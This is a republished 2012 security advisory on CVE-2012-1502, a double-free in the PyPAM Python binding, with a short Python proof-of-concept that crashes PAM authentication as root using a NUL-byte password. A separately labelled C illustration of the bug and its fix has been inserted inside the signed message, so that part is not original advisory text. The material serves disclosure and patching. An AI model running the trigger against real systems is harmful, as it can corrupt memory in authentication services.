PyPAM 0.4.2 Double-Free Corruption

09 Mar 2012, reported by Markus Vervier. Type: packetstorm. Source: packetstormsecurity.com

PyPAM 0.4.2 Double Free Corruption security advisory for affected Python binding

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1  
  
- -----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
=== LSE Leading Security Experts - Security Advisory 2012-03-01 ===  
  
PyPAM -- Python bindings for PAM - Double Free Corruption  
- - ---------------------------------------------------------  
  
Affected Versions  
=================  
PyPAM <= 0.4.2  
Red Hat PyPAM <= 0.5.0-12  
Debian python-pam <= 0.4.2-12.2  
Ubuntu python-pam <= 0.4.2-12.2  
SUSE python-pam <= 0.5.0-79.1.2  
Gentoo pypam <= 0.5.0  
  
Problem Overview  
================  
Technical Risk: high  
Likelihood of Exploit: low to medium  
Vendor: Rob Riggs, Various  
Discovery: Markus Vervier  
Advisory URL: http://www.lsexperts.de/advisories/lse-2012-03-01.txt  
Advisory Status: Public  
CVE-Number: CVE-2012-1502  
  
Problem Description  
===================  
While conducting an internal test LSE discovered that by supplying  
a password containing a NULL-byte to the PyPAM module, a double-free [1]  
condition is triggered. This leads to undefined behaviour and may allow  
remote code execution.  
  
Temporary Workaround and Fix  
============================  
Filtering NULL-bytes in strings before passing them to the PyPAM module  
will mitigate the exploit. Also current GLIBC protections may prevent  
the double-free condition from being exploitable. It is advised to update  
to a fixed version of PyPAM.  
  
Detailed Description  
====================  
When PyArg_ParseTuple() in line 81 of PAMmodule.c is given a string with
NUL bytes, a TypeError exception is raised [2]. The security problem is in
line 82 of PAMmodule.c where free() is called on *resp, but *resp is not
set to NULL. On line 95 in libpam's v_prompt.c the _pam_drop macro calls
free on the response again unless (*resp == NULL), which leads to
undefined behaviour.
  
The following PoC script triggers the problem:  
  
<--snip-->  
#!/usr/bin/env python
##
## python-pam 0.4.2 double free PoC (Python 2 syntax, as PyPAM is a Python 2 binding)
##
## 2012 Leading Security Experts GmbH
## Markus Vervier
##
# -*- coding: utf-8 -*-

def verify_password(user, password):
    import PAM

    # Conversation callback: answer every PAM prompt with the supplied password.
    def pam_conv(auth, query_list, userData):
        resp = []
        resp.append((password, 0))
        return resp

    res = -3
    service = 'passwd'

    auth = PAM.pam()
    auth.start(service)
    auth.set_item(PAM.PAM_USER, user)
    auth.set_item(PAM.PAM_CONV, pam_conv)
    try:
        auth.authenticate()
        auth.acct_mgmt()
    except PAM.error, resp:
        print 'Go away! (%s)' % resp
        res = -1
    except:
        print 'Internal error'
        res = -2
    else:
        print 'Good to go!'
        res = 0

    return res

# The embedded NUL byte makes PyArg_ParseTuple() fail inside the binding,
# which is the path that frees the response twice.
print verify_password("root", "a\x00secret")
<--snip-->  
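As an added illustration (not code from the advisory, from PyPAM or from libpam), the following C program models the defect described in the Detailed Description and the filter recommended under Temporary Workaround and Fix. A conversation callback converts each reply to a C string and, like the PyArg_ParseTuple() call in PAMmodule.c, rejects a reply with an embedded NUL byte; a libpam-style caller then releases the response through a macro that frees only when the pointer is non-NULL. The vulnerable shape frees the response but leaves the caller's pointer dangling; the fixed shape clears it. All names here (the `pam_drop` macro, `conv_vulnerable`, `conv_fixed`, `run_conversation`, `reply_to_cstring`, the struct layouts and return codes) are simplified stand-ins chosen for this example, not the real libpam API.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified stand-ins for the libpam types and return codes (assumed
 * shapes for this example, not the real <security/pam_appl.h>). */
#define PAM_SUCCESS  0
#define PAM_CONV_ERR 19

struct pam_response { char *resp; int resp_retcode; };

/* One application reply; the length is explicit because, as in the PoC,
 * a reply may legitimately contain NUL bytes. */
struct reply { const char *buf; size_t len; };

/* Caller-side cleanup in the style of libpam's _pam_drop: free only if the
 * pointer is non-NULL, then clear it. A callee that frees the buffer but
 * leaves the pointer set defeats this guard and the buffer is freed twice. */
#define pam_drop(X) do { if (X) { free(X); (X) = NULL; } } while (0)

/* Stand-in for the "s" conversion in PyArg_ParseTuple(): a reply holding an
 * embedded NUL cannot become a C string, so the conversion fails. This is
 * also the check the workaround asks applications to perform up front. */
int reply_to_cstring(const char *buf, size_t len, char **out) {
    if (memchr(buf, '\0', len) != NULL)
        return -1;                       /* TypeError in the Python binding */
    *out = malloc(len + 1);
    if (*out == NULL) return -1;
    memcpy(*out, buf, len);
    (*out)[len] = '\0';
    return 0;
}

static void free_responses(struct pam_response *r, int n) {
    for (int i = 0; i < n; i++) free(r[i].resp);
    free(r);
}

/* Vulnerable shape: on conversion failure the array is released, but the
 * caller's out-pointer still holds the freed address. */
int conv_vulnerable(int num_msg, const struct reply *replies,
                    struct pam_response **resp) {
    *resp = calloc((size_t)num_msg, sizeof(**resp));
    if (*resp == NULL) return PAM_CONV_ERR;
    for (int i = 0; i < num_msg; i++) {
        if (reply_to_cstring(replies[i].buf, replies[i].len, &(*resp)[i].resp) != 0) {
            free_responses(*resp, i);    /* BUG: *resp left dangling */
            return PAM_CONV_ERR;
        }
    }
    return PAM_SUCCESS;
}

/* Fixed shape: clear the out-pointer after freeing, so the caller's
 * pam_drop() sees NULL and does nothing. */
int conv_fixed(int num_msg, const struct reply *replies,
               struct pam_response **resp) {
    *resp = calloc((size_t)num_msg, sizeof(**resp));
    if (*resp == NULL) return PAM_CONV_ERR;
    for (int i = 0; i < num_msg; i++) {
        if (reply_to_cstring(replies[i].buf, replies[i].len, &(*resp)[i].resp) != 0) {
            free_responses(*resp, i);
            *resp = NULL;                /* FIX: nothing left for the caller to free */
            return PAM_CONV_ERR;
        }
    }
    return PAM_SUCCESS;
}

/* Caller modelled on libpam: run the conversation, copy the first answer out
 * on success, and always drop the response afterwards. Safe only if the
 * callee never hands back a freed pointer. */
int run_conversation(int (*conv)(int, const struct reply *, struct pam_response **),
                     const struct reply *replies, int n, char *copy, size_t copy_len) {
    struct pam_response *resp = NULL;
    int rc = conv(n, replies, &resp);
    if (rc == PAM_SUCCESS && copy != NULL && n > 0)
        snprintf(copy, copy_len, "%s", resp[0].resp);
    if (resp != NULL)
        for (int i = 0; i < n; i++) pam_drop(resp[i].resp);
    pam_drop(resp);                      /* second free if the callee dangled */
    return rc;
}

int main(void) {
    const struct reply good = { "secret", 6 };
    const struct reply bad  = { "a\0secret", 8 };   /* the PoC's "a\x00secret" */
    char out[32];
    printf("fixed, clean password: rc=%d copy=%s\n",
           run_conversation(conv_fixed, &good, 1, out, sizeof out), out);
    printf("fixed, embedded NUL:   rc=%d\n",
           run_conversation(conv_fixed, &bad, 1, out, sizeof out));
    /* run_conversation(conv_vulnerable, &bad, ...) would be the double free
     * itself and is deliberately not executed. */
    return 0;
}
```

The caller's NULL guard is only as good as the contract that a failing callee leaves nothing behind in the out-pointer; the one-line `*resp = NULL` is what restores that contract. The NUL check in `reply_to_cstring` is the same test an application can apply in Python before calling into the binding, which is why the workaround of filtering NUL bytes closes the path even on an unpatched module.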
  
History  
=======  
2012-03-02 Problem discovery during internal QA  
2012-03-05 Original vendor and Debian maintainer contacted  
2012-03-06 Public Patch released  
2012-03-07 Various maintainers contacted  
2012-03-07 CVE-2012-1502 assigned  
2012-03-08 LSE learned that this bug was previously discovered and
fixed in rPath Linux [3]
2012-03-08 Coordinated Advisory Release  
  
References  
==========  
[1] http://cwe.mitre.org/data/definitions/415.html  
[2] http://docs.python.org/release/1.5.2p2/ext/parseTuple.html  
[3] https://issues.rpath.com/browse/RPL-2773  
  
  
- - --  
http://www.lsexperts.de  
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt  
Registered office: Weiterstadt, Darmstadt District Court: HRB8649
Managing Directors: Oliver Michel, Sven Walther, Dr. Peter Schill
- -----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iQEcBAEBAgAGBQJPWTGEAAoJEK9u9A5+VXgeidQH/ideiS6fiMUGSBMz51W42/+l  
x0Qm/f2W6LV3NdEO5674wg07nFHju2LBYFHy1Ng5LyLPdIXO3q08DVG8h7vZJAdl  
hKdegiwyA0ALqfv2uc4gT3kGm1GUxguGLg43z5c89lIsXV8p2ng+ZynLQ2yhcTQz  
X32LyS+dcshdiTIYxgLJDAoSKn1ZiGd/tQ07kjzFG6EicP3+CxP1gjJDg6W16KvV  
9Uk+7lHaNfUdqcZTwEhIQwxAE9dU51HK5d+/W6VaGfPdv1d1m6kdvb59kkEeBPcq  
T930i0SsrpJrGYaNFy3Toebi+/yJzvcegdJmQWC6gvw2WJCZf8Fd1H5tU3LCO9E=  
=MNYZ  
- -----END PGP SIGNATURE-----  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iQEcBAEBAgAGBQJPWTG5AAoJEK9u9A5+VXgeS8AH/06N4JcJ0FXU4AZi2gPx8v9O  
fM6C3K6f374Ta3/FmgURHouxBfDHEjypuerstGY+PNggpc2XakbQzGUromd1iQ1i  
nIp3wPjVhFc906x3vJ/K3XO6Nyq5HgfEuCV0qIsLKiRxRFKWYxElgmpDznQoFPW/  
HnNaqN/GozzD3ik3XHQZ6fCG3jGctaeJHC1MwJ33xrDdSPq9HyHM0hGDSWBlNZSE  
hIgBFnK34qLuZfnAc5voV7FwzlIBaptcFmEjpbMglNJ1PJZ7NCBt4jydqoOPUvfe  
15cg9xxXBnFDBefI7c0/PnoTs3pHHrB3Op257fRmz1DaX0e7ZnjpNb/Y54DBZ5I=  
=draZ  
-----END PGP SIGNATURE-----  
  